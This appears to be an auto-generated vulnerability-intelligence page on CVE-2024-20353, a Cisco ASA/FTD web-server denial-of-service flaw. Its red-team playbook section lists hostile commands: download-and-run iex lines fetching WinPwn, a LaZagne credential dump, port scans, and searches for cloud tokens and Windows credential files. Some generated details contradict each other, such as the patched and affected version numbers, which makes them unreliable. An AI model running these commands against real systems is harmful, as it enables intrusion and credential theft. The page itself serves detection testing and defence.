CVE-2024-20353
Overview
This vulnerability is a denial of service (DoS) condition caused by improper input validation in the HTTP header parsing logic of the management and VPN web servers within Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software. The root cause is incomplete error checking during HTTP header processing, which leads to a device reload when malformed HTTP requests are received. The affected components are the web server modules responsible for management and VPN functions in specific ASA software versions.
Vulnerability Description
A vulnerability in the management and VPN web servers for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to incomplete error checking when parsing an HTTP header. An attacker could exploit this vulnerability by sending a crafted HTTP request to a targeted web server on a device. A successful exploit could allow the attacker to cause a DoS condition when the device reloads.
Impact
An unauthenticated attacker can remotely trigger a device reload by sending malicious HTTP requests, causing a denial of service that disrupts network security operations. No user interaction or credentials are required, enabling potential service outages and impacting availability of critical firewall and VPN services. This disruption can affect business continuity and network reliability until the device recovers or is manually restarted.
Solution
Cisco has released security updates addressing this vulnerability in ASA software versions 9.8.2.9 and later. Administrators should apply the patches as detailed in Cisco Security Advisory cisco-sa-asaftd-websrvs-dos-X8gNucD2 available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-websrvs-dos-X8gNucD2. Following the advisory's instructions ensures mitigation of the HTTP header parsing flaw causing device reloads.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the management and VPN web servers of Cisco's Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software. This flaw arises from inadequate error checking during the parsing of HTTP headers, which can be exploited by an unauthenticated remote attacker. By sending a specially crafted HTTP request to the targeted web server, an attacker can trigger an unexpected device reload, leading to a denial of service (DoS) condition. The severity of this vulnerability is underscored by its CVSS score of 8.6, indicating a high level of risk that organizations must address promptly.
The attack vector for this vulnerability is relatively straightforward, as it requires only the ability to send HTTP requests to the vulnerable web server. Given that many organizations expose their security appliances to the internet for management purposes, the potential for exploitation is significant. Attackers could leverage automated tools to scan for vulnerable devices, sending crafted requests that exploit the error-checking weakness. Once successfully exploited, the device would reload, resulting in service interruptions that could affect network security and availability.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Cisco's security appliances for their network defenses. A successful exploitation could lead to prolonged downtime, disrupting business operations and potentially exposing sensitive data to further attacks. The financial repercussions could include lost revenue, remediation costs, and damage to the organization's reputation. Moreover, the inability to maintain secure network operations during an attack could lead to compliance violations, especially for organizations in regulated industries.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the affected software to the latest versions is crucial, as vendors typically release patches to address known vulnerabilities. Additionally, organizations should employ intrusion detection systems (IDS) to monitor for unusual HTTP traffic patterns that may indicate an attempted exploitation. Network segmentation can also reduce exposure by limiting access to management interfaces only to trusted internal networks. Implementing strict firewall rules to restrict access to the management interfaces can further enhance security.
In conclusion, the vulnerability in Cisco's ASA and FTD software presents a significant risk that organizations must take seriously. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare to defend against such threats. Proactive detection and mitigation strategies are essential to safeguard network infrastructure and maintain business continuity in the face of evolving cyber threats. Organizations must remain vigilant and responsive to emerging vulnerabilities to protect their assets and ensure operational resilience.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-20353, with initial sightings emerging in our telemetry. This development indicates that threat actors are actively probing or attempting to exploit the vulnerability in Cisco ASA and FTD web servers, which could lead to denial of service conditions through unexpected device reloads. Although no new exploit code or ransomware group associations have been identified, the sudden increase in detection signals a shift from theoretical risk to active reconnaissance or exploitation attempts in the wild. This escalation elevates the urgency for defenders to prioritize monitoring for anomalous HTTP requests targeting management and VPN web interfaces on affected devices. While the EPSS score remains stable, the presence of real-world activity heightens the threat level from potential to imminent, underscoring the need for heightened situational awareness and rapid incident response capabilities.
Update 2 — June 23, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-20353, with telemetry indicating a significant surge in attempts to exploit the vulnerability. This increase is reflected in a substantial rise in the Exploit Prediction Scoring System (EPSS) score, which now places the vulnerability in the 0.99th percentile, signaling a shift toward active exploitation attempts rather than theoretical risk. Although no new exploit code or ransomware group associations have been identified, the sharp upward trend in detection events suggests that threat actors are intensifying reconnaissance or initial exploitation efforts targeting the affected Cisco ASA and Firepower devices. This development elevates the threat level from high to critical, emphasizing that defenders must now consider this vulnerability as imminently exploitable in operational environments. The rapid increase in EPSS and detection frequency underscores an evolving threat landscape where opportunistic attackers may leverage this flaw to disrupt network security infrastructure through denial-of-service conditions.
Affected Products (267)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.1 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.1:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.1.5 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.1.5:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.1.7 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.1.7:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.8 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.8:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.14 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.14:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.15 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.15:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.17 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.17:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.20 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.20:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.24 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.24:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.26 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.26:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.28 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.28:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.33 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.33:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.35 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.35:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.38 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.38:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.3 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.3:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.3.8 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.3.8:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.3.11 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.3.11:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.3.14 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.3.14:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.3.16 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.3.16:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-20353 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-websrvs-dos-X8gNucD2 |
| blog.talosintelligence.com |
NVD API
Exploit
Third Party Advisory
|
https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-20353 |